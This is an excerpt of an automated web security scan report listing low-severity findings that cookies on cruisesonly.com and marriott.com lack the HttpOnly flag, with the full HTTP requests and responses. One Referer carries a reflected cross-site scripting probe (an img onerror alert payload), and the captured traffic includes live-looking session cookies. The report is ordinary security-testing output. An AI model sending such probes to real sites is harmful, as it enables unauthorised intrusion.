User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; sid=6383; AFF%5FCID=%22%22; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:02 GMT
Server: Apache
Content-Length: 0
Content-Type: text/plain
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:02 GMT;path=/

12.46. http://www.cruisesonly.com/ajaxhtml/filterdynamic.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /ajaxhtml/filterdynamic.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxhtml/filterdynamic.do?http://www.cruisesonly.com/promotion/bermuda-cruises.do HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/html; charset=utf-8
Accept: text/html, */*; q=0.01
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660; AFF%5FCID=6386; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.6.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:28 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; Expires=Thu, 30-Sep-2021 12:45:29 GMT; Path=/
Set-Cookie: IncludeAlumniRates=1c8fe3904be4744e95f12c08; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=6386; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:47:29 GMT;path=/
Cache-Control: private
Content-Length: 37692


<script language="JavaScript">
var CruiseALLArray = new Array("('All Ships ','ALL',true,true)");
var Cruise325Array = new Array("('All Ships ','ALL',true,true)",
"('Azamara Journey
...[SNIP]...
12.47. http://www.cruisesonly.com/ajaxjson/filterdynamic.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /ajaxjson/filterdynamic.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajaxjson/filterdynamic.do?wdos=3&porttype=E&SType=P&ptype=c&type=c&shoppingZipCode=Zip+Code&SType=A&clp=1&sort=7&changedDdl=undefined HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/json; charset=utf-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:52 GMT
Server: Apache
Content-Length: 6721
Content-Type: application/json;charset=UTF-8
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:42:52 GMT;path=/


{"months":[{"key":"ALL","value":"Any"},{"key":"10/1/2011","value":"October 2011"},{"key":"11/1/2011","value":"November 2011"},{"key":"12/1/2011","value":"December 2011"},{"key":"1/1/2012",
...[SNIP]...
12.48. http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /groupcruises/promos/whatisgroup.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groupcruises/promos/whatisgroup.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 55607
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 55607


<script language="javascript" src="/code/webdata/webdataregister.asp?webdataID=1910"></script>

<script language="javascript" src="/Code/javascript/JSPopup.js"></script>
<script language="java
...[SNIP]...
12.49. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/ajax/logerror.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/javascript/ajax/logerror.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:42:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45952
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 45952


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
12.50. http://www.cruisesonly.com/promotion/bermuda-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /promotion/bermuda-cruises.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotion/bermuda-cruises.do HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:23 GMT
Server: Apache
Content-Length: 116327
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:47:23 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
12.51. http://www.cruisesonly.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /sc.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:18 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; Expires=Thu, 30-Sep-2021 12:41:18 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:41:18 GMT; Path=/
Set-Cookie: shoppingZipCode=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:18 GMT;path=/
Cache-Control: private
Content-Length: 139727


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
12.52. http://www.cruisesonly.com/sharedwidgets/Caribbean.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /sharedwidgets/Caribbean.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharedwidgets/Caribbean.do?pageType=sharedwidgets HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.1.10.1317645662; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BrowserTest=ON

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:49 GMT
Server: Apache
Content-Length: 30270
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:42:49 GMT;path=/


<script language="javascript" src="/Code/javascript/general/cookies.js"></script>
<script language="Javascript" src="/Code/javascript/JSPopup.js"></script>

       
<!--CMS servername and times
...[SNIP]...
12.53. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
12.54. http://www.marriott.com/!crd_prm!.!cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /!crd_prm!.!cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=669945&crd_cnt=0.01&crd_tpb=1317646533158&crd_olt=8359 HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_SITE=prod3; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_pers=%20s_lv%3D1317646536434%7C1412254536434%3B%20s_lv_s%3DFirst%2520Visit%7C1317648336434%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; fsr.a=1317646541286; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"}}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:55:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
12.55. http://www.marriott.com/default.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /default.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.mi HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:55:28 GMT
Content-Length: 99749
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
12.56. http://www.marriott.com/search/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/a HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=d3646%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E9b47fe00376&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; IS3_History=1317397011-1-67_16-1-__16_; s_pers=%20s_lv%3D1317646791478%7C1412254791478%3B%20s_lv_s%3DFirst%2520Visit%7C1317648591478%3B; JVMID=pEbizMdcomD171_prd3; MI_SITE=prod3; mbox=session#1317646533235-184575#1317649764|PC#1317646533235-184575.19#1318857504|check#true#1317647964

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 16:11:09 GMT
ETag: "681ae-27e9-247ae140"
Accept-Ranges: bytes
Content-Length: 10217
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:17:57 GMT
Connection: close
Set-Cookie: MI_SITE=prod3;path=/

